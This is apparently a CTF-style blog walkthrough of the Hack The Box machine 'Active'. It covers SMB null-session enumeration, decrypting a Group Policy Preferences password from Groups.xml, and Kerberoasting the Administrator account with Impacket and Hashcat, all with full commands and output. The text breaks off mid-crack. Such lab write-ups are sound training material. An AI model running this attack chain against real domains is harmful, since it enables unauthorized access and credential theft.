If you're interested in more Active Directory fun, check out my previous article on over-permissive file shares: https://medium.com/@jabaribrown62/the-danger-of-over-permissive-file-shares-bea10fab5190
Now let's start our journey with an Nmap scan.
jbrown@Jabaris-MacBook-Pro active % sudo nmap -sV -sC -O -T4 10.129.5.64
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 07:32 -0400
Nmap scan report for 10.129.5.64
Host is up (0.036s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-12 11:32:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Device type: general purpose
Running: Microsoft Windows 2008|7|Vista|8.1
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Vista SP2 or Windows 7 or Windows Server 2008 R2 or Windows 8.1
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-12T11:33:39
|_ start_date: 2026-03-12T11:24:33
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.62 secondsFrom the scan results, we can see that LDAP is running along with Kerberos and SMB on port 445. We've also identified the domain: active.htb.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-12 11:32:40Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
Host script results:
| smb2-time:
| date: 2026-03-12T11:33:39
|_ start_date: 2026-03-12T11:24:33
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and requiredAt this point we have two options. We can check if an anonymous bind to LDAP is allowed, or test for anonymous access on the SMB share.
Let's start with the SMB share and see if anonymous access is allowed using NetExec.
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u anonymous -p ""
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [-] active.htb\anonymous: STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u anonymous -p anonymous
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [-] active.htb\anonymous:anonymous STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro active %
It doesn't look like anonymous access is allowed, but let's try again using empty strings. While researching this, I learned the nuance between a null session and a guest/anonymous account.
Quick summary:
A null session (no username, no password) doesn't attempt to authenticate as a user at all. Instead, it tries to connect to the IPC$ share anonymously to gather information. If the server's RestrictAnonymous policy is set to 1 or 2, the server will block this even if the ports are open.
In this case, the null session works and allows us to access the SMB shares.
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u '' -p ''
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [+] active.htb\:
jbrown@Jabaris-MacBook-Pro active %Now that we have access, we can enumerate the SMB shares to see what permissions we have. It looks like we only have READ access to the Replication share.
To dig a little deeper, we can use the spider module to search through the share and see if it contains any sensitive files.
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u '' -p '' --shares
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [+] active.htb\:
SMB 10.129.5.64 445 DC [*] Enumerated shares
SMB 10.129.5.64 445 DC Share Permissions Remark
SMB 10.129.5.64 445 DC ----- ----------- ------
SMB 10.129.5.64 445 DC ADMIN$ Remote Admin
SMB 10.129.5.64 445 DC C$ Default share
SMB 10.129.5.64 445 DC IPC$ Remote IPC
SMB 10.129.5.64 445 DC NETLOGON Logon server share
SMB 10.129.5.64 445 DC Replication READ
SMB 10.129.5.64 445 DC SYSVOL Logon server share
SMB 10.129.5.64 445 DC Users
jbrown@Jabaris-MacBook-Pro active %
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u '' -p '' --shares -M spider_plus
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [+] active.htb\:
SPIDER_PLUS 10.129.5.64 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.5.64 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.5.64 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 10.129.5.64 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.5.64 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.5.64 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.5.64 445 DC [*] OUTPUT_FOLDER: /Users/jbrown/.nxc/modules/nxc_spider_plus
SMB 10.129.5.64 445 DC [*] Enumerated shares
SMB 10.129.5.64 445 DC Share Permissions Remark
SMB 10.129.5.64 445 DC ----- ----------- ------
SMB 10.129.5.64 445 DC ADMIN$ Remote Admin
SMB 10.129.5.64 445 DC C$ Default share
SMB 10.129.5.64 445 DC IPC$ Remote IPC
SMB 10.129.5.64 445 DC NETLOGON Logon server share
SMB 10.129.5.64 445 DC Replication READ
SMB 10.129.5.64 445 DC SYSVOL Logon server share
SMB 10.129.5.64 445 DC Users
SPIDER_PLUS 10.129.5.64 445 DC [+] Saved share-file metadata to "/Users/jbrown/.nxc/modules/nxc_spider_plus/10.129.5.64.json".
SPIDER_PLUS 10.129.5.64 445 DC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.129.5.64 445 DC [*] SMB Readable Shares: 1 (Replication)
SPIDER_PLUS 10.129.5.64 445 DC [*] Total folders found: 22
SPIDER_PLUS 10.129.5.64 445 DC [*] Total files found: 7
SPIDER_PLUS 10.129.5.64 445 DC [*] File size average: 1.16 KB
SPIDER_PLUS 10.129.5.64 445 DC [*] File size min: 22 B
SPIDER_PLUS 10.129.5.64 445 DC [*] File size max: 3.63 KB
jbrown@Jabaris-MacBook-Pro active % cat ~/.nxc/modules/nxc_spider_plus/10.129.5.64.json
{
"Replication": {
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "23 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "119 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "1.07 KB"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "533 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "2.72 KB"
},
"active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "22 B"
},
"active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "3.63 KB"
}
}
}% jbrown@Jabaris-MacBook-Pro active %Next, I like to use smbclient.py to grab the files from the share.
jbrown@Jabaris-MacBook-Pro examples % python3 smbclient.py -target-ip 10.129.5.64 -no-pass target
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Replication
# dir
*** Unknown syntax: dir
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 active.htb
# cd active.htb
# cd Policies
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
# cd {31B2F340-016D-11D2-945F-00C04FB984F9}
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 23 Sat Jul 21 06:38:11 2018 GPT.INI
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Group Policy
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 MACHINE
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 USER
# cd USER
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
# cd ..
# cd MACHINE
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Microsoft
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Preferences
-rw-rw-rw- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
# get Registry.pol
# cd Preferences
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Groups
# cd Groups
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 533 Sat Jul 21 06:38:11 2018 Groups.xml
# get Groups.xml
# cd Windows NT
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 SecEdit
# cd SecEdit
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 1098 Sat Jul 21 06:38:11 2018 GptTmpl.inf
# get GptTmpl.inf
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
# cd {6AC1786C-016F-11D2-945F-00C04fB984F9}
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 22 Sat Jul 21 06:38:11 2018 GPT.INI
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 MACHINE
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 USER
# get GPT.INI
# cd Machine
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Microsoft
# cd Microsoft
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Windows NT
# cd Windows NT
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 SecEdit
# cd SecEdit
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 3722 Sat Jul 21 06:38:11 2018 GptTmpl.inf
# get GptTmpl.inf
#Looking at the Groups.xml file, we can see that it contains the password for a service account.
jbrown@Jabaris-MacBook-Pro active % cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
jbrown@Jabaris-MacBook-Pro active %After doing some quick research, it looks like this is a Group Policy Preferences password, a well-known vulnerability that was actually introduced by Microsoft itself (lol). The passwords were stored encrypted in these XML files, but Microsoft later published the encryption key, which means anyone can decrypt them.
jbrown@Jabaris-MacBook-Pro tools % gpp-decrypt
usage: gpp-decrypt [-h] [-v] [--verbose] [--no-banner] (-f FILE | -c CPASS)
gpp-decrypt: error: one of the arguments -f/--file -c/--cpassword is required
jbrown@Jabaris-MacBook-Pro tools % gpp-decrypt -c "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ • ] GPP-Decrypt v2.0.0 - Group Policy Preferences Password Decryptor
[ • ] Author: Kristof Toth (@t0thkr1s)
[ ✓ ] Decrypted password: GPPstillStandingStrong2k18ఌఌఌఌఌఌ
jbrown@Jabaris-MacBook-Pro tools %Now that we have credentials for a new account, we can check again to see if we have access to any additional SMB shares.
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u SVC_TGS -p GPPstillStandingStrong2k18 --shares
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.5.64 445 DC [*] Enumerated shares
SMB 10.129.5.64 445 DC Share Permissions Remark
SMB 10.129.5.64 445 DC ----- ----------- ------
SMB 10.129.5.64 445 DC ADMIN$ Remote Admin
SMB 10.129.5.64 445 DC C$ Default share
SMB 10.129.5.64 445 DC IPC$ Remote IPC
SMB 10.129.5.64 445 DC NETLOGON READ Logon server share
SMB 10.129.5.64 445 DC Replication READ
SMB 10.129.5.64 445 DC SYSVOL READ Logon server share
SMB 10.129.5.64 445 DC Users READ
jbrown@Jabaris-MacBook-Pro active %I ran into some hiccups with NetExec while trying to spider the share, but that's okay. We already know we have read access to the Users share, so we can just use smbclient.py instead.
jbrown@Jabaris-MacBook-Pro examples % python3 smbclient.py active.htb/SVC_TGS@10.129.5.64
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use Users
# ls
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 .
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 ..
drw-rw-rw- 0 Mon Jul 16 06:14:21 2018 Administrator
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 All Users
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Default
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 Default User
-rw-rw-rw- 174 Mon Jul 16 17:01:17 2018 desktop.ini
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Public
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
# cd Public
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# cd All Users
[-] SMB SessionError: code: 0x8000002d - STATUS_STOPPED_ON_SYMLINK - The create operation stopped after reaching a symbolic link.
# cd SVC_TGS
# ls
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 .
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 ..
drw-rw-rw- 0 Sat Jul 21 11:14:20 2018 Contacts
drw-rw-rw- 0 Sat Jul 21 11:14:42 2018 Desktop
drw-rw-rw- 0 Sat Jul 21 11:14:28 2018 Downloads
drw-rw-rw- 0 Sat Jul 21 11:14:50 2018 Favorites
drw-rw-rw- 0 Sat Jul 21 11:15:00 2018 Links
drw-rw-rw- 0 Sat Jul 21 11:15:23 2018 My Documents
drw-rw-rw- 0 Sat Jul 21 11:15:40 2018 My Music
drw-rw-rw- 0 Sat Jul 21 11:15:50 2018 My Pictures
drw-rw-rw- 0 Sat Jul 21 11:16:05 2018 My Videos
drw-rw-rw- 0 Sat Jul 21 11:16:20 2018 Saved Games
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 Searches
# cd Desktop
# ls
drw-rw-rw- 0 Sat Jul 21 11:14:42 2018 .
drw-rw-rw- 0 Sat Jul 21 11:14:42 2018 ..
-rw-rw-rw- 34 Thu Mar 12 07:25:39 2026 user.txt
# get user.txt
#
I moved the flag to the Active Directory box and voilà — magic. (Future voice 😄)
jbrown@Jabaris-MacBook-Pro active % cat user.txt
***UserFlagFoundHere***
jbrown@Jabaris-MacBook-Pro active %Now let's load up PowerView.py and begin enumerating during the post-exploitation phase.
╭─LDAP─[DC.active.htb]─[ACTIVE\SVC_TGS]-[NS:10.129.5.64]
╰─ ❯ Get-DomainUser
objectClass : top
person
organizationalPerson
user
cn : SVC_TGS
distinguishedName : CN=SVC_TGS,CN=Users,DC=active,DC=htb
name : SVC_TGS
objectGUID : {8c9d3235-1d0a-4db1-99ee-3f783d1a9bd6}
userAccountControl : NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 12/03/2026 18:47:35 (today)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 12/03/2026 18:48:17 (today)
pwdLastSet : 18/07/2018 20:14:38 (7 years, 7 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-405608879-3187717380-1996298813-1103
sAMAccountName : SVC_TGS
sAMAccountType : SAM_USER_OBJECT
userPrincipalName : SVC_TGS@active.htb
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
lastLogonTimestamp : 12/03/2026 18:48:17 (today)
vulnerabilities : [VULN-002] User account with password that never expires (LOW)
objectClass : top
person
organizationalPerson
user
cn : krbtgt
description : Key Distribution Center Service Account
distinguishedName : CN=krbtgt,CN=Users,DC=active,DC=htb
memberOf : CN=Denied RODC Password Replication Group,CN=Users,DC=active,DC=htb
name : krbtgt
objectGUID : {43d7a1e7-a5a6-49ab-82d0-e24e7472f88d}
userAccountControl : ACCOUNTDISABLE
NORMAL_ACCOUNT
badPwdCount : 0
badPasswordTime : 01/01/1601 00:00:00 (425 years, 2 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 01/01/1601 00:00:00 (425 years, 2 months ago)
pwdLastSet : 18/07/2018 18:50:36 (7 years, 7 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-405608879-3187717380-1996298813-502
adminCount : 1
sAMAccountName : krbtgt
sAMAccountType : SAM_USER_OBJECT
servicePrincipalName : kadmin/changepw
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
objectClass : top
person
organizationalPerson
user
cn : Guest
description : Built-in account for guest access to the computer/domain
distinguishedName : CN=Guest,CN=Users,DC=active,DC=htb
memberOf : CN=Guests,CN=Builtin,DC=active,DC=htb
name : Guest
objectGUID : {128734a9-ff0e-4f5c-8c95-a14738a11801}
userAccountControl : ACCOUNTDISABLE
PASSWD_NOTREQD
NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 01/01/1601 00:00:00 (425 years, 2 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 01/01/1601 00:00:00 (425 years, 2 months ago)
pwdLastSet : 01/01/1601 00:00:00 (425 years, 2 months ago)
primaryGroupID : 514
objectSid : S-1-5-21-405608879-3187717380-1996298813-501
sAMAccountName : Guest
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
objectClass : top
person
organizationalPerson
user
cn : Administrator
description : Built-in account for administering the computer/domain
distinguishedName : CN=Administrator,CN=Users,DC=active,DC=htb
memberOf : CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb
CN=Domain Admins,CN=Users,DC=active,DC=htb
CN=Enterprise Admins,CN=Users,DC=active,DC=htb
CN=Schema Admins,CN=Users,DC=active,DC=htb
CN=Administrators,CN=Builtin,DC=active,DC=htb
name : Administrator
objectGUID : {25ca718e-7312-467f-955a-4c4f10963c1e}
userAccountControl : NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 30/07/2018 17:17:35 (7 years, 7 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 12/03/2026 11:25:43 (today)
pwdLastSet : 18/07/2018 19:06:40 (7 years, 7 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-405608879-3187717380-1996298813-500
adminCount : 1
sAMAccountName : Administrator
sAMAccountType : SAM_USER_OBJECT
servicePrincipalName : active/CIFS:445
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
lastLogonTimestamp : 12/03/2026 11:24:52 (today)
vulnerabilities : [VULN-001] Kerberoastable high privilege account (MEDIUM)
[VULN-002] User account with password that never expires (LOW)
[VULN-020] Admin account with delegation enabled (HIGH)
╭─LDAP─[DC.active.htb]─[ACTIVE\SVC_TGS]-[NS:10.129.5.64]
╰─ ❯We can see that the Administrator account is Kerberoastable. Why? Because it has an SPN set. Any authenticated domain user can request a service ticket for accounts with SPNs, and in this case it just happens to be the Administratoraccount.
We can use the Impacket suite to request the ticket, then use Hashcat to crack the hash offline.
jbrown@Jabaris-MacBook-Pro examples % python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 --dc-ip 10.129.5.64 -request
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-no-preauth NO_PREAUTH] [-stealth] [-machine-only] [-usersfile USERSFILE] [-request] [-request-user username | -request-machine machinename]
[-save] [-outputfile OUTPUTFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]
target
GetUserSPNs.py: error: unrecognized arguments: --dc-ip 10.129.5.64
jbrown@Jabaris-MacBook-Pro examples % python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.5.64 -request
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2026-03-12 07:25:43.945762
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$efc61854f043150d962fac56d17ef9e4$ecd203c73bea10c35e5d04764024506e7bfc81f9e98c5588d2193972afa2cff88b927afeac4a1ff88a661b2d7f687bd0fd59b362088d540e2ee78f619cc234d508256e91afdc9fd86f03bbc3dffc3560bbb4e4e1cf9e409cfe94303b02b9bd2739c25105514e0f47cb20af8bc6b208d0cf5adc8c80494e67f2301429ef976bcda228e6ac6ff39d5cb4b35618f7d2f6b4293794898ff4b842cf2563a761cbb8594d6f0eab85087752b5a262838379d9b451db3cec77813c30cfd10a941398f51d6e04645a45d57ab59b22565def2868d96c02c676b0089453a4222d708d0d01a6189b07c7d4c000020b9088830ed6aa00e8cc84c35ecb367ab472ede020993ac39c423668b9aadddbcbb5af3982f9d34dbac0339b6dc6ed8e13951b78ad6eeb20edb87571eb4e54b247324d29aa14d97c0f8df510ac4f33a36a839703bdcd88c693245976967c2db19ca841d25dacdd3fd30a7365e40e5cd2679379ef7cc27cb16abd2feee8e439d750cb959a663ab1392585e4671b06a1600bf5645fccbd7ae1cce9eaa0c677d3979fcf4d7330de8e59a91155ad29666bec28b00feafdb7fca5623c5b3e68919e31784efa0a19d76a151ca1078d0a675fd7f26ebe5de2acdddc092250fb2b8f96c9fa597d9e519622eab0e8e2617a0d5e83ec64aabd5c3dae024dc3b0da6360811bfd015b6efe5cda8646a07a1a3249e27800592abc0adc7883eaab170aa3d96fab433b7c7d10d71edce1f9b5eee19ff0d5cc8053ed1547b40a3c2322481c4156bbd9079c003b4abe4c11092ab3c8a3c83b8bb70b7e145e629b00f83769e590c0b65bdf9d58017ad637470e89d977ae85836c65bb0e71643bbc01ee2c77d8e47d14dd5ef24b376d25a084321d7c031964e415e45605d517f187715a3fa582543acc54149ca93b5667846f191a19d4a23f6a5bda5e9bb04942d95c26ce9cef6ae9258419657a412ebd560231d27e19833d39e46038611575349816453830c258245ea22fdcaa36b4fc30e525fe89474832b7c3277b902ed5558259837c0dedc2416976386af9adf914f1e42433b4430907ec7e92f2b8f869d3289c53859099a24ed46271917f6ff7030e1fdf44c19b45d3115735e3c15d57b9547547d9aabe44deb9dcf545ed24b54fb08b19d284f79969b920c9296b539aae4ba80750feef96ee717ccfe9396ee48cdf92ba835a128b7df20f313321a3743070f1720e215af94408c87b9d3f8c13ee9c3830bd80e13a8bc24050
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 100c
Host memory allocated for this attack: 599 MB (1115 MB free)
Dictionary cache hit:
* Filename..: ../../wordlist/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
